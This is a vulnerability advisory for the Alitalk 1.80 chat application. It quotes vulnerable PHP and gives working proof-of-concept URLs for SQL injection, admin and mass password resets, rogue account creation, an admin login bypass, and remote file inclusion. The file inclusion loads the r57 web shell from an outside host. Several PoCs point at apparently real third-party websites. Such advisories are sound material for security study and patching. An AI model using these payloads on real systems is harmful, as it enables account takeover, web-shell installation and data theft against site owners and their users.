Alitalk 1.80 SQL Injection / Bypass

2015.06.18
Credit: indoushka
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: POWERED BY ALITALK

| # Title : alitalk v.1.80 Multiple Vulnerability | # Author : indoushka | # email : indoushka4ever@gmail.com | # Dork : POWERED BY ALITALK | # Tested on: windows 8.1 Franais V.(Pro) | # Download : http://teh24h.ir/ ======================================= SQL INJECTION : you need to login in order to exploit this vulnerability vulnerable code on inc/receivertwo.php <? ..... if($_GET['turnadd']==1) { $rmusr=0; $rmmzyiz=mysql_query("SELECT * from ".$alitalk_base['dbprefix']."users where room='".$_GET['mohit']."'"); while ($rmuiz=mysql_fetch_array($rmmzyiz)) { echo"<rmusj>"; echo" r%dtr onmouseout=\"detailsclo()\" onmouseover=\"details(event,'".$rmuiz[gender]."','".$rmuiz[age]."','".$rmuiz[username]."','".$rmuiz[location]."')\" ondblclick=\"ums('".$rmuiz[uid]."','".$rmuiz[username]."','".""."')\" b*%d r%dtd width='19'b*%d r%dimg src=\"pix/room_user.gif\"b*%dr%d/tdb*%d r%dtd class='roomuser'b*%dr%dfont unselectable='on' style=\"cursor: default;\"b*%d $rmuiz[username] r%d/tdb*%d r%d/trb*%d"; $rmusr++; echo"</rmusj>"; } .... ?> poc: http://target/path/alitalk/inc/receivertwo.php?uid=1&mohit=y'+union+select+user(),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2+from+alitalk_users+where+uid='1&turnadd=1&melody=0&lilil=400 PASSWORD CHANGE BYPASS : vulnerable code on functionz/usercp.php <? ..... function newpass($db,$id) { $nat=md5($_GET['old'].$_GET['old']); $nao=md5($_GET['new'].$_GET['new']); $threeyiz=mysql_query("SELECT * from ".$db."users where uid='".$id."' and password='".md5(md5($_GET['old']).$nat)."'"); $yiz=mysql_fetch_array($threeyiz); if(!$yiz) { echo "Old Password is Wrong!"; } else { mysql_query("UPDATE ".$db."users SET password='".md5(md5($_GET['new']).$nao)."' WHERE uid='".$id."'"); mysql_query("UPDATE ".$db."users SET salt='".$nao."' WHERE uid='".$id."'"); mpl($db,$id); } } ..... ?> pocs: http://target/path/inc/usercp.php?action=newpass&id=1' or password='&lilil=400&new=algeria this will change password to "algeria" for user with uid = 1 (admin). http://target/path/inc/usercp.php?action=newpass&id=1' or 1='1&lilil=400&new=algeria this will change ALL passwords to "algeria". http://www.taoa-tanzania.com/chat/alitalk/inc/elementz.php?lilil=400&ubild=indoushka&pa=algeria USER REGISTRATION BYPASS : vulnerable code on inc/elementz.php: <? ...... if($_GET['lilil']!=="".$_SESSION['lilol'].""){return false;} include"setting.php"; $analuze=mysql_query("SELECT username from ".$alitalk_base['dbprefix']."users where username='".$_GET['ubild']."' and type='alitalk'"); $analuzeed=mysql_fetch_array($analuze); if($analuzeed) { echo "Fatal Error"; } else { $nat=md5($_GET['pa'].$_GET['pa']); $pass=md5(md5($_GET['pa']).$nat); mysql_query("INSERT into ".$alitalk_base['dbprefix']."users (firstname,lastname,gender,age,username,password,salt,joindate,addz,type) values('".$_GET['fn']."','".$_GET['ln']."','".$_GET['gender']."','".$_GET['age']."','".$_GET['ubild']."','".$pass."','".$nat."','".date("F j, Y")."','$uid','alitalk')"); .... ?> poc: http://target/path/inc/elementz.php?lilil=400&ubild=algeria&pa=algeria this will add an account with username=algeria and password=algeria Access Bypass : code on admin/index.php <? ....... else if($_POST['signin']) { include "../functionz/first_process.php"; include "../inc/setting.php"; addin($_POST['username'],$_POST['password'],$alitalk_base['dbprefix']); } ..... ?> vulnerable code on functionz/first_process.php <? ...... function addin($lamerz,$killer,$josh) { session_start(); $nat=md5($killer.$killer); $analuze=mysql_query("SELECT * FROM ".$josh."info WHERE admin='".$lamerz."' AND password='".md5(md5($killer).$nat)."'"); $analuzeed=mysql_fetch_array($analuze); if($analuzeed) { $_SESSION['adazsar']=1; ?> admin login page= http://target/path/admin poc: ID = an_userID' or 1='1 password = whatever L/R file inclusion : C:\web\www\alitalk\inc\elementd.php require_once('lang/'.$alitalk['lang'].'/menu.php'); Line : 31 Function : require_once Variables : $alitalk['lang'] poc : http://www.nickerie.net/chat/inc/elementd.php?alitalk[lang]=http://www.dcvi.net/r57.txt Greetz : jericho http://attrition.org & http://www.osvdb.org/ * packetstormsecurity.com * http://is-sec.org/cc/ Hussin-X * Stake (www.v4-team.com) * D4NB4R * ViRuS_Ra3cH * yasMouh * https://www.corelan.be * exploit4arab.net ---------------------------------------------------------------------------------------------------------------


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top